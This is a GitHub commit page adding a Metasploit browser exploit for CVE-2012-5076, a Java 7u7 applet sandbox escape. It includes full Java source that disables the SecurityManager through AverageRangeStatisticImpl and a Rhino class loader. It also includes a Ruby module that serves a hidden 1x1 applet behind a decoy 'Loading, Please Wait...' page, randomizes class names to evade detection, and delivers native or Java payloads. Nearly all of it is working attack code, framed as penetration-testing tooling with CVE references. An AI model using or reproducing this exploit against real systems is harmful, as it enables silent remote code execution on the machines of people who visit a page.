Skip to content
Browse files

Merge branch 'java_jre17_glassfish_averagerangestatisticimpl' of http…

…s://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-java_jre17_glassfish_averagerangestatisticimpl
  • Loading branch information...
2 parents c498930 + 3465aa0 commit 807bd6e88ac90e8cfdc260bcbe1e0fadf17de725 jvazquez-r7 committed
View
BIN data/exploits/cve-2012-5076_2/B.class
Binary file not shown.
View
BIN data/exploits/cve-2012-5076_2/Exploit.class
Binary file not shown.
View
19 external/source/exploits/cve-2012-5076_2/B.java
@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+ implements PrivilegedExceptionAction
+{
+ public B()
+ {
+ try
+ {
+ AccessController.doPrivileged(this); } catch (Exception e) {
+ }
+ }
+
+ public Object run() {
+ System.setSecurityManager(null);
+ return new Object();
+ }
+}
View
78 external/source/exploits/cve-2012-5076_2/Exploit.java
@@ -0,0 +1,78 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+//import java.lang.Runtime;
+import java.applet.Applet;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+import com.sun.org.glassfish.external.statistics.impl.*;
+
+public class Exploit extends Applet
+{
+ public static MethodHandles.Lookup test0;
+
+ public Exploit()
+ {
+ }
+
+
+ public void init()
+ {
+ try
+ {
+
+ ByteArrayOutputStream bos = new ByteArrayOutputStream();
+ byte[] buffer = new byte[8192];
+ int length;
+
+ // read in the class file from the jar
+ InputStream is = getClass().getResourceAsStream("B.class");
+ // and write it out to the byte array stream
+ while( ( length = is.read( buffer ) ) > 0 )
+ bos.write( buffer, 0, length );
+ // convert it to a simple byte array
+ buffer = bos.toByteArray();
+
+ Class c = Class.forName("java.lang.invoke.MethodHandles");
+ Method m = c.getMethod("lookup", new Class[0]);
+ AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
+ MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
+
+ MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
+ MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
+ Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
+ Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
+
+ // Instance of sun.org.mozilla.javascript.internal.Context
+ MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
+ MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
+ Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
+
+ // Context.createClassLoader
+ MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
+ MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
+ Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
+
+ // GeneratedClassLoader.defineClass
+ MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+ MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
+ Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
+
+ //New instance of the helper Class
+ localClass3.newInstance();
+
+ Payload.main(null);
+ //Runtime.getRuntime().exec("calc.exe");
+ }
+ catch(Throwable ex)
+ {
+ //ex.printStackTrace();
+ }
+ }
+
+}
View
18 external/source/exploits/cve-2012-5076_2/Makefile
@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+ Exploit.java \
+ B.java
+
+.SUFFIXES: .java .class
+.java.class:
+ javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+ mv Exploit.class ../../../../data/exploits/cve-2013-0422/
+ mv B.class ../../../../data/exploits/cve-2013-0422/
+
+clean:
+ rm -rf *.class
View
132 modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+
+ super( update_info( info,
+ 'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',
+ 'Description' => %q{
+ This module abuses the AverageRangeStatisticImpl from a Java Applet to run
+ arbitrary Java code outside of the sandbox, a different exploit vector than the one
+ exploited in the wild in November of 2012. The vulnerability affects Java version
+ 7u7 and earlier.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability discovery at security-explorations
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5076' ],
+ [ 'OSVDB', '86363' ],
+ [ 'BID', '56054' ],
+ [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
+ [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Platform' => ['java'],
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Mac OS X x86 (Native Payload)',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Oct 16 2012'
+ ))
+ end
+
+
+ def setup
+ path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
+ @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
+ @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ @exploit_class_name = rand_text_alpha("Exploit".length)
+ @exploit_class.gsub!("Exploit", @exploit_class_name)
+ super
+ end
+
+ def on_request_uri(cli, request)
+ print_status("handling request for #{request.uri}")
+
+ case request.uri
+ when /\.jar$/i
+ jar = payload.encoded_jar
+ jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+ jar.add_file("B.class", @loader_class)
+ metasploit_str = rand_text_alpha("metasploit".length)
+ payload_str = rand_text_alpha("payload".length)
+ jar.entries.each { |entry|
+ entry.name.gsub!("metasploit", metasploit_str)
+ entry.name.gsub!("Payload", payload_str)
+ entry.data = entry.data.gsub("metasploit", metasploit_str)
+ entry.data = entry.data.gsub("Payload", payload_str)
+ }
+ jar.build_manifest
+
+ send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+ when /\/$/
+ payload = regenerate_payload(cli)
+ if not payload
+ print_error("Failed to generate the payload.")
+ send_not_found(cli)
+ return
+ end
+ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+ else
+ send_redirect(cli, get_resource() + '/', '')
+ end
+
+ end
+
+ def generate_html
+ html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
+ html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
+ html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+ html += %Q|</applet></body></html>|
+ return html
+ end
+
+end

0 comments on commit 807bd6e

Please sign in to comment.
Something went wrong with that request. Please try again.